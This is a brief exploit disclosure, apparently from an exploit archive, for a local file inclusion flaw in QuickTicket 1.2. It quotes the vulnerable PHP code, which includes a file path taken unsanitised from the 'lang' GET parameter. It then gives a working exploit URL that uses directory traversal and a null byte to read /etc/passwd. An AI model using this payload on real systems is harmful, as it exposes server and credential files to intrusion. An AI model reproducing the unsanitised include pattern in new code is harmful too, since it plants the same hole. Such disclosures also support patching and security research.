QuickTicket version 1.2 suffers from a local file inclusion vulnerability in qti_checkname.php.
71544a547a68d6a05fbf7e16cb9e1f8f5a8727924b0b7b3cc17fb1621087b31a
###QuickTicket v1.2 Local File Inclusion###
#download: http://www.qt-cute.org/download/qti12.zip
#found by: katatafish (karatatata@hush.com)
#vulncode:
$strLang = $_GET["lang"];
include("language/$strLang/qtf_lang_reg.inc");
#exploit:
http://www.site.com/[path]/qti_checkname.php?lang=./../../../../../../../../../../etc/passwd%00
#thanks:str0ke